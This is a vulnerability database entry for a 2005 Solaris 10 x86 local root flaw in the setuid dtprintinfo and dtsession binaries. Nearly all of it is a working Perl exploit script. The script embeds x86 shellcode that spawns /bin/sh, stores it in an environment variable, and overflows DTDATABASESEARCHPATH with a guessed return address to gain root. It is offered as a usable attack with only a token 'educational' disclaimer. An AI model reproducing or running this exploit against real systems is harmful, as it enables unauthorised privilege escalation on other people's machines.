Solaris 10 (x86) – DtPrintinfo/Session Privilege Escalation

Vulnerability ID 1055405 Vulnerability type
Published 2005-10-12 Updated 2005-10-12
CVE ID N/A
CNNVD-ID N/A
Platform Solaris CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/1248
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability exploit (EXP)
#!/usr/bin/perl 
#######################################################################
#
# Solaris 10 DtPrintinfo/Session Exploit (x86)
#
# EDUCATIONAL purposes only.... :-)
#
# by Charles Stevenson (core) <[email protected]>
#
# greetz to raptor for sharing this vulnerability and in no specific
# order just want to show love for: nemo, andrewg, jduck, bannedit,
# runixd, charbuff, sloth, ktha, KF, akt0r, MRX, salvia, etc.
#
# irc.pulltheplug.org (#social)
# 0dd: much <3 & respect
# 
# 10/12/05 - FF local root
#
#######################################################################
#               PRIVATE - DO NOT DISTRIBUTE - PRIVATE                 #
#######################################################################

#You can try lots of dt* suids.  I'm too lazy to code the loop ;-o
$dtsuid = "dtprintinfo";
#$dtsuid = "dtsession";

$sc = "\x90" x (511-108) .

# anathema <[email protected]>
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04".
"\xc3\xeb\x05\xe8\xf9\xff\xff\xff\x5e".
"\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50".
"\xb0\x8d\xe8\xe0\xff\xff\xff\x29\xc0".
"\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb".
"\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0".
"\x88\x46\x19\x89\x46\x14\x89\x46\x0f".
"\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51".
"\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff".
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01".
"\x01\x01\x01\x02\x02\x02\x02\x03\x03".
"\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

print "\n\n$dtsuid root exploit\n";
print "----------------------------------------------\n";
print "Written by Charles Stevenson <[email protected]>\n\n";

# Clear out the environment. 
foreach $key (keys %ENV) { delete $ENV{$key}; } 

# Setup simple env so ret is easier to guess
$ENV{"HELLCODE"} = "$sc"; 
$ENV{"TERM"} = "xterm"; 
$ENV{"DISPLAY"} = "127.0.0.1:0";
$ENV{"PATH"} = "/usr/dt/bin:/bin:/sbin:/usr/sbin:/usr/bin";

# Create the payload...
#$ENV{"DTDATABASESEARCHPATH"} = "////" . "ABCD"x360; # raptor
$ENV{"DTDATABASESEARCHPATH"} = "////" . pack("l",0x8047890)x360;


# If you don't get root try other dt setuid binaries
print "Trying to own $dtsuid...\n";
system("/usr/dt/bin/$dtsuid"); 

# EOF

# milw0rm.com [2005-10-12]
